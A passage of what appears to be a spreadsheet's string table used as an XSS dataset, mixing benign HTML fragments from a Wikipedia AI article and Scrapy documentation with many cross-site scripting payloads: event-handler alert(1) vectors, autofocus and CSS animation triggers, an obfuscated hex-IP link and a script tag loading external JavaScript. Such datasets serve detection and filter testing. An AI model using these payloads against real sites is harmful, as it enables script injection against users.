  </si>
  <si>
    <t>&lt;template onmousemove="alert(1)"&gt;test&lt;/template&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Willard_Van_Orman_Quine" title="Willard Van Orman Quine"&gt;W. V. O. Quine &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;s onpointerleave=alert(1)&gt;XSS&lt;/s&gt;</t>
  </si>
  <si>
    <t>&lt;strong onkeydown="alert(1)" contenteditable&gt;test&lt;/strong&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-305"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-305"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;keygen draggable="true" ondragend="alert(1)"&gt;test&lt;/keygen&gt;</t>
  </si>
  <si>
    <t>&lt;fieldset id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/fieldset&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Atomtronics" title="Atomtronics"&gt;Atomtronics &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Discrete_mathematics" title="Discrete mathematics"&gt;Discrete mathematics &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;html onmouseenter="alert(1)"&gt;test&lt;/html&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;	 </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;&lt;a rel="nofollow" class="external text" href="http://sports.sina.com.cn/go/2016-08-02/doc-ifxunyya3020238.shtml"&gt;"柯洁迎19岁生日 雄踞人类世界排名第一已两年" &lt;/a&gt; (in Chinese). May 2017. &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20170811222849/http://sports.sina.com.cn/go/2016-08-02/doc-ifxunyya3020238.shtml"&gt;Archived &lt;/a&gt; from the original on 11 August 2017. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=unknown&amp;amp;rft.btitle=%E6%9F%AF%E6%B4%81%E8%BF%8E19%E5%B2%81%E7%94%9F%E6%97%A5+%E9%9B%84%E8%B8%9E%E4%BA%BA%E7%B1%BB%E4%B8%96%E7%95%8C%E6%8E%92%E5%90%8D%E7%AC%AC%E4%B8%80%E5%B7%B2%E4%B8%A4%E5%B9%B4&amp;amp;rft.date=2017-05&amp;amp;rft_id=http%3A%2F%2Fsports.sina.com.cn%2Fgo%2F2016-08-02%2Fdoc-ifxunyya3020238.shtml&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;base onpointerenter=alert(1)&gt;XSS&lt;/base&gt;</t>
  </si>
  <si>
    <t>&lt;head onmouseover="alert(1)"&gt;test&lt;/head&gt;</t>
  </si>
  <si>
    <t>&lt;abbr onpointerdown=alert(1)&gt;XSS&lt;/abbr&gt;</t>
  </si>
  <si>
    <t>&lt;main ondblclick="alert(1)"&gt;test&lt;/main&gt;</t>
  </si>
  <si>
    <t>&lt;menuitem onpointerout=alert(1)&gt;XSS&lt;/menuitem&gt;</t>
  </si>
  <si>
    <t>&lt;rp draggable="true" ondragend="alert(1)"&gt;test&lt;/rp&gt;</t>
  </si>
  <si>
    <t>&lt;td id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/td&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;i&gt;&lt;a href="/wiki/A.I._Rising" title="A.I. Rising"&gt;A.I. Rising &lt;/a&gt; &lt;/i&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">  &lt;title&gt;Scrapy 2.0 documentation &amp;mdash; Scrapy 2.0.0 documentation&lt;/title&gt;</t>
  </si>
  <si>
    <t>&lt;hr onmousedown="alert(1)"&gt;test&lt;/hr&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Swarm_intelligence" title="Swarm intelligence"&gt;Swarm intelligence &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;nextid oncontextmenu="alert(1)"&gt;test&lt;/nextid&gt;</t>
  </si>
  <si>
    <t>&lt;style onbeforepaste="alert(1)" contenteditable&gt;test&lt;/style&gt;</t>
  </si>
  <si>
    <t>&lt;tr ondblclick="alert(1)"&gt;test&lt;/tr&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-1 tocsection-72"&gt;&lt;a href="#References"&gt;&lt;span class="tocnumber"&gt;13 </t>
  </si>
  <si>
    <t>&lt;shadow onkeypress="alert(1)" contenteditable&gt;test&lt;/shadow&gt;</t>
  </si>
  <si>
    <t>&lt;a onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/a&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;form oncut="alert(1)" contenteditable&gt;test&lt;/form&gt;</t>
  </si>
  <si>
    <t>&lt;main draggable="true" ondrag="alert(1)"&gt;test&lt;/main&gt;</t>
  </si>
  <si>
    <t>&lt;base onbeforecopy="alert(1)" contenteditable&gt;test&lt;/base&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;meter style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/meter&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-3 tocsection-19"&gt;&lt;a href="#Anti-logic_or_scruffy"&gt;&lt;span class="tocnumber"&gt;5.2.3 </t>
  </si>
  <si>
    <t>&lt;svg id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/svg&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;rp onpointerleave=alert(1)&gt;XSS&lt;/rp&gt;</t>
  </si>
  <si>
    <t>&lt;big id=x tabindex=1 onactivate=alert(1)&gt;&lt;/big&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Anti-logic or scruffy </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;"There exist many different types of uncertainty, vagueness, and ignorance... [We] independently confirm the inadequacy of systems for reasoning about uncertainty that propagates numerical factors according to only to which connectives appear in assertions."&lt;sup id="cite_ref-199" class="reference"&gt;&lt;a href="#cite_note-199"&gt;&amp;#91;195&amp;#93; &lt;/a&gt; &lt;/sup&gt; </t>
  </si>
  <si>
    <t>&lt;kbd id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/kbd&gt;</t>
  </si>
  <si>
    <t>&lt;big draggable="true" ondragend="alert(1)"&gt;test&lt;/big&gt;</t>
  </si>
  <si>
    <t>&lt;dl ondblclick="alert(1)"&gt;test&lt;/dl&gt;</t>
  </si>
  <si>
    <t>&lt;frameset onpointerdown=alert(1)&gt;XSS&lt;/frameset&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;span&gt;&lt;a href="/wiki/Portal:Computer_programming" title="Portal:Computer programming"&gt;Computer programming portal &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;data onblur=alert(1) tabindex=1 id=x&gt;&lt;/data&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;script onkeydown="alert(1)" contenteditable&gt;test&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFCrevier1993"&gt;Crevier 1993 &lt;/a&gt;, pp.&amp;#160;145–149 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;u onmouseout="alert(1)"&gt;test&lt;/u&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFCrevier1993"&gt;Crevier 1993 &lt;/a&gt;, pp.&amp;#160;271 and 279 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;tr id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/tr&gt;</t>
  </si>
  <si>
    <t>&lt;plaintext draggable="true" ondragenter="alert(1)"&gt;test&lt;/plaintext&gt;</t>
  </si>
  <si>
    <t>&lt;applet onkeyup="alert(1)" contenteditable&gt;test&lt;/applet&gt;</t>
  </si>
  <si>
    <t>&lt;header draggable="true" ondragleave="alert(1)"&gt;test&lt;/header&gt;</t>
  </si>
  <si>
    <t>&lt;dialog onmouseleave="alert(1)"&gt;test&lt;/dialog&gt;</t>
  </si>
  <si>
    <t>&lt;progress id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/progress&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;picture onmouseenter="alert(1)"&gt;test&lt;/picture&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;details id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/details&gt;</t>
  </si>
  <si>
    <t>&lt;custom tags onpointerdown=alert(1)&gt;XSS&lt;/custom tags&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;source id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/source&gt;</t>
  </si>
  <si>
    <t>&lt;audio onpointerup=alert(1)&gt;XSS&lt;/audio&gt;</t>
  </si>
  <si>
    <t>&lt;u id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/u&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">		&lt;img alt="Page protected with pending changes" src="//upload.wikimedia.org/wikipedia/en/thumb/b/b7/Pending-protection-shackle.svg/20px-Pending-protection-shackle.svg.png" decoding="async" width="20" height="20" srcset="//upload.wikimedia.org/wikipedia/en/thumb/b/b7/Pending-protection-shackle.svg/30px-Pending-protection-shackle.svg.png 1.5x, //upload.wikimedia.org/wikipedia/en/thumb/b/b7/Pending-protection-shackle.svg/40px-Pending-protection-shackle.svg.png 2x" data-file-width="512" data-file-height="512" /&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;/a&gt;&lt;/dt&gt;&lt;dd&gt;Get answers to most frequently asked questions.&lt;/dd&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;a href="/wiki/Moravec%27s_paradox" title="Moravec&amp;#39;s paradox"&gt;Moravec's paradox &lt;/a&gt; generalizes that low-level sensorimotor skills that humans take for granted are, counterintuitively, difficult to program into a robot; the paradox is named after </t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;command id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/command&gt;</t>
  </si>
  <si>
    <t>&lt;strike draggable="true" ondragenter="alert(1)"&gt;test&lt;/strike&gt;</t>
  </si>
  <si>
    <t>&lt;listing id=x tabindex=1 onfocus=alert(1)&gt;&lt;/listing&gt;</t>
  </si>
  <si>
    <t>&lt;button onkeydown="alert(1)" contenteditable&gt;test&lt;/button&gt;</t>
  </si>
  <si>
    <t>&lt;div role="navigation" class="navbox" aria-labelledby="Computer_science" style="padding:3px"&gt;&lt;table class="nowraplinks hlist mw-collapsible autocollapse navbox-inner" style="border-spacing:0;background:transparent;color:inherit"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;th scope="col" class="navbox-title" colspan="2"&gt;</t>
  </si>
  <si>
    <t>&lt;time onpointerenter=alert(1)&gt;XSS&lt;/time&gt;</t>
  </si>
  <si>
    <t>&lt;time id=x tabindex=1 onactivate=alert(1)&gt;&lt;/time&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;If research into &lt;a href="/wiki/Artificial_general_intelligence" title="Artificial general intelligence"&gt;Strong AI &lt;/a&gt; produced sufficiently intelligent software, it might be able to reprogram and improve itself. The improved software would be even better at improving itself, leading to &lt;a href="/wiki/Intelligence_explosion" class="mw-redirect" title="Intelligence explosion"&gt;recursive self-improvement &lt;/a&gt;.&lt;sup id="cite_ref-recurse_409-0" class="reference"&gt;&lt;a href="#cite_note-recurse-409"&gt;&amp;#91;397&amp;#93; &lt;/a&gt; &lt;/sup&gt; The new intelligence could thus increase exponentially and dramatically surpass humans. Science fiction writer &lt;a href="/wiki/Vernor_Vinge" title="Vernor Vinge"&gt;Vernor Vinge &lt;/a&gt; named this scenario "&lt;a href="/wiki/Technological_singularity" title="Technological singularity"&gt;singularity &lt;/a&gt;".&lt;sup id="cite_ref-Singularity_410-0" class="reference"&gt;&lt;a href="#cite_note-Singularity-410"&gt;&amp;#91;398&amp;#93; &lt;/a&gt; &lt;/sup&gt; Technological singularity is when accelerating progress in technologies will cause a runaway effect wherein artificial intelligence will exceed human intellectual capacity and control, thus radically changing or even ending civilization. Because the capabilities of such an intelligence may be impossible to comprehend, the technological singularity is an occurrence beyond which events are unpredictable or even unfathomable.&lt;sup id="cite_ref-Singularity_410-1" class="reference"&gt;&lt;a href="#cite_note-Singularity-410"&gt;&amp;#91;398&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-Roberts_147-2" class="reference"&gt;&lt;a href="#cite_note-Roberts-147"&gt;&amp;#91;144&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Fragmentation_of_AI-14"&gt;&lt;span class="mw-cite-backlink"&gt;^ &lt;a href="#cite_ref-Fragmentation_of_AI_14-0"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;a &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; &lt;a href="#cite_ref-Fragmentation_of_AI_14-1"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;b &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-386"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-386"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;div onmousedown="alert(1)"&gt;test&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;samp id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/samp&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;tr style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/tr&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-1 tocsection-26"&gt;&lt;a href="#Tools"&gt;&lt;span class="tocnumber"&gt;6 </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;a href="/wiki/Paul_Werbos" title="Paul Werbos"&gt;Paul Werbos &lt;/a&gt;, "Beyond Regression: New Tools for Prediction and Analysis in the Behavioral Sciences", &lt;i&gt;PhD thesis, Harvard University &lt;/i&gt;, 1974. </t>
  </si>
  <si>
    <t>&lt;svg onkeypress="alert(1)" contenteditable&gt;test&lt;/svg&gt;</t>
  </si>
  <si>
    <t>&lt;br onmouseenter="alert(1)"&gt;test&lt;/br&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/ul&gt;    </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-82"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-82"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;span oncopy="alert(1)" contenteditable&gt;test&lt;/span&gt;</t>
  </si>
  <si>
    <t>&lt;u onpaste="alert(1)" contenteditable&gt;test&lt;/u&gt;</t>
  </si>
  <si>
    <t>&lt;hr id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/hr&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;samp onpointermove=alert(1)&gt;XSS&lt;/samp&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFLugerStubblefield2004"&gt;Luger &amp;amp; Stubblefield 2004 &lt;/a&gt;, pp.&amp;#160;~182–190, ≈363–379, &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/div&gt;&lt;img src="//en.wikipedia.org/wiki/Special:CentralAutoLogin/start?type=1x1" alt="" title="" width="1" height="1" style="border: none; position: absolute;" /&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;meter onmouseover="alert(1)"&gt;test&lt;/meter&gt;</t>
  </si>
  <si>
    <t>&lt;source onmousemove="alert(1)"&gt;test&lt;/source&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;&lt;a rel="nofollow" class="external text" href="https://sloanreview.mit.edu/projects/reshaping-business-with-artificial-intelligence/"&gt;"Reshaping Business With Artificial Intelligence" &lt;/a&gt;. &lt;i&gt;MIT Sloan Management Review &lt;/i&gt;&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;2 May </t>
  </si>
  <si>
    <t>&lt;dl onbeforecut="alert(1)" contenteditable&gt;test&lt;/dl&gt;</t>
  </si>
  <si>
    <t>&lt;samp oncontextmenu="alert(1)"&gt;test&lt;/samp&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;9, 21–22 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;spacer onmouseover="alert(1)"&gt;test&lt;/spacer&gt;</t>
  </si>
  <si>
    <t>&lt;caption onkeyup="alert(1)" contenteditable&gt;test&lt;/caption&gt;</t>
  </si>
  <si>
    <t>&lt;h1 oncut="alert(1)" contenteditable&gt;test&lt;/h1&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Learning </t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/div&gt; &lt;/td&gt; &lt;/tr&gt;&lt;tr&gt;&lt;th scope="row" class="navbox-group" style="width:7.5em"&gt;Philosophy of &lt;/th&gt;&lt;td class="navbox-list navbox-odd" style="text-align:left;border-left-width:2px;border-left-style:solid;padding:0px"&gt;</t>
  </si>
  <si>
    <t>&lt;dt&gt;&lt;a class="reference internal" href="topics/debug.html"&gt;&lt;span class="doc"&gt;Debugging Spiders</t>
  </si>
  <si>
    <t>&lt;rt onkeypress="alert(1)" contenteditable&gt;test&lt;/rt&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;content ondrop=alert(1) contenteditable&gt;drop here&lt;/content&gt;</t>
  </si>
  <si>
    <t>&lt;dt&gt;&lt;a class="reference internal" href="topics/signals.html"&gt;&lt;span class="doc"&gt;Signals</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFWeizenbaum1976"&gt;Weizenbaum 1976 &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;progress ondragover=alert(1) contenteditable&gt;drop here&lt;/progress&gt;</t>
  </si>
  <si>
    <t>&lt;kbd onpointermove=alert(1)&gt;XSS&lt;/kbd&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">      &lt;script type="text/javascript" id="documentation_options" data-url_root="./" src="_static/documentation_options.js"&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;meta onmouseover="alert(1)"&gt;test&lt;/meta&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;label style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/label&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div class="magnify"&gt;&lt;a href="/wiki/File:Hierarchical-control-system.svg" class="internal" title="Enlarge"&gt; &lt;/a&gt; &lt;/div&gt;A &lt;a href="/wiki/Hierarchical_control_system" title="Hierarchical control system"&gt;hierarchical control system &lt;/a&gt; is a form of &lt;a href="/wiki/Control_system" title="Control system"&gt;control system &lt;/a&gt; in which a set of devices and governing software is arranged in a hierarchy. &lt;/div&gt; &lt;/div&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;head onmouseup="alert(1)"&gt;test&lt;/head&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;a href="#CITEREFDomingos2015"&gt;Domingos 2015 &lt;/a&gt;, Chapter 4. </t>
  </si>
  <si>
    <t>&lt;var onkeyup="alert(1)" contenteditable&gt;test&lt;/var&gt;</t>
  </si>
  <si>
    <t>&lt;iframe onpointerdown=alert(1)&gt;XSS&lt;/iframe&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Early researchers developed algorithms that imitated step-by-step reasoning that humans use when they solve puzzles or make logical deductions.&lt;sup id="cite_ref-Reasoning_88-0" class="reference"&gt;&lt;a href="#cite_note-Reasoning-88"&gt;&amp;#91;85&amp;#93; &lt;/a&gt; &lt;/sup&gt; By the late 1980s and 1990s, AI research had developed methods for dealing with &lt;a href="/wiki/Uncertainty" title="Uncertainty"&gt;uncertain &lt;/a&gt; or incomplete information, employing concepts from &lt;a href="/wiki/Probability" title="Probability"&gt;probability &lt;/a&gt; and &lt;a href="/wiki/Economics" title="Economics"&gt;economics &lt;/a&gt;.&lt;sup id="cite_ref-Uncertain_reasoning_89-0" class="reference"&gt;&lt;a href="#cite_note-Uncertain_reasoning-89"&gt;&amp;#91;86&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;menu onclick="alert(1)"&gt;test&lt;/menu&gt;</t>
  </si>
  <si>
    <t>&lt;dt&gt;&lt;a class="reference internal" href="topics/stats.html"&gt;&lt;span class="doc"&gt;Stats Collection</t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;a href="/wiki/Logic" title="Logic"&gt;Logic &lt;/a&gt;&lt;sup id="cite_ref-Logic_194-0" class="reference"&gt;&lt;a href="#cite_note-Logic-194"&gt;&amp;#91;190&amp;#93; &lt;/a&gt; &lt;/sup&gt; is used for knowledge representation and problem solving, but it can be applied to other problems as well. For example, the &lt;a href="/wiki/Satplan" title="Satplan"&gt;satplan &lt;/a&gt; algorithm uses logic for &lt;a href="/wiki/Automated_planning_and_scheduling" title="Automated planning and scheduling"&gt;planning &lt;/a&gt;&lt;sup id="cite_ref-Satplan_195-0" class="reference"&gt;&lt;a href="#cite_note-Satplan-195"&gt;&amp;#91;191&amp;#93; &lt;/a&gt; &lt;/sup&gt; and &lt;a href="/wiki/Inductive_logic_programming" title="Inductive logic programming"&gt;inductive logic programming &lt;/a&gt; is a method for &lt;a href="/wiki/Machine_learning" title="Machine learning"&gt;learning &lt;/a&gt;.&lt;sup id="cite_ref-Symbolic_learning_techniques_196-0" class="reference"&gt;&lt;a href="#cite_note-Symbolic_learning_techniques-196"&gt;&amp;#91;192&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;bgsound oncut="alert(1)" contenteditable&gt;test&lt;/bgsound&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=18" title="Edit section: Logic-based"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t>&lt;A HREF="http://0x42.0x0000066.0x7.0x93/"&gt;&lt;/A&gt;</t>
  </si>
  <si>
    <t>&lt;li class="toctree-l1"&gt;&lt;a class="reference internal" href="news.html"&gt;Release notes&lt;/a&gt;&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;bdo onkeydown="alert(1)" contenteditable&gt;test&lt;/bdo&gt;</t>
  </si>
  <si>
    <t>&lt;font ondblclick="alert(1)"&gt;test&lt;/font&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-56"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-56"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;shadow oncontextmenu="alert(1)"&gt;test&lt;/shadow&gt;</t>
  </si>
  <si>
    <t>&lt;SCRIPT a="&gt;" SRC="httx://.rocks/.js"&gt;&lt;/SCRIPT&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-FOOTNOTEDomingos2015Chapter_1-67"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-FOOTNOTEDomingos2015Chapter_1_67-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;picture oncut="alert(1)" contenteditable&gt;test&lt;/picture&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=21" title="Edit section: Sub-symbolic"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Computational_social_science" title="Computational social science"&gt;Computational social science &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;noscript style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/noscript&gt;</t>
  </si>
  <si>
    <t>&lt;header onpointermove=alert(1)&gt;XSS&lt;/header&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;input id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/input&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">    &lt;div role="main" class="document" itemscope="itemscope" itemtype="http://schema.org/Article"&gt;</t>
  </si>
  <si>
    <t>&lt;form&gt;&lt;input type=search onsearch=alert(1) value="Hit return" autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Epistemology" title="Epistemology"&gt;Epistemology &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;input3 onpointerover=alert(1)&gt;XSS&lt;/input3&gt;</t>
  </si>
  <si>
    <t>&lt;SCRIPT DEFER&gt;alert("")&lt;/SCRIPT&gt;</t>
  </si>
  <si>
    <t>&lt;plaintext onpointermove=alert(1)&gt;XSS&lt;/plaintext&gt;</t>
  </si>
  <si>
    <t>&lt;track onpointermove=alert(1)&gt;XSS&lt;/track&gt;</t>
  </si>
  <si>
    <t>&lt;dt draggable="true" ondragenter="alert(1)"&gt;test&lt;/dt&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;Bostrom, Nick (2015). &lt;a rel="nofollow" class="external text" href="https://www.ted.com/talks/nick_bostrom_what_happens_when_our_computers_get_smarter_than_we_are/transcript"&gt;"What happens when our computers get smarter than we are?" &lt;/a&gt;. &lt;a href="/wiki/TED_(conference)" title="TED (conference)"&gt;TED (conference) &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=unknown&amp;amp;rft.btitle=What+happens+when+our+computers+get+smarter+than+we+are%3F&amp;amp;rft.pub=TED+%28conference%29&amp;amp;rft.date=2015&amp;amp;rft.aulast=Bostrom&amp;amp;rft.aufirst=Nick&amp;amp;rft_id=https%3A%2F%2Fwww.ted.com%2Ftalks%2Fnick_bostrom_what_happens_when_our_computers_get_smarter_than_we_are%2Ftranscript&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;em id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/em&gt;</t>
  </si>
  <si>
    <t>&lt;bdi onpointerover=alert(1)&gt;XSS&lt;/bdi&gt;</t>
  </si>
  <si>
    <t>&lt;ol oncopy="alert(1)" contenteditable&gt;test&lt;/ol&gt;</t>
  </si>
  <si>
    <t>&lt;spacer onpointerup=alert(1)&gt;XSS&lt;/spacer&gt;</t>
  </si>
  <si>
    <t>&lt;input onpaste=alert(1) value="" autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;tbody id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/tbody&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;svg id=x onfocusin=alert(1)&gt;</t>
  </si>
  <si>
    <t>&lt;frameset id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/frameset&gt;</t>
  </si>
  <si>
    <t>&lt;dialog onpointerenter=alert(1)&gt;XSS&lt;/dialog&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Bayesian_network" title="Bayesian network"&gt;Bayesian networks &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
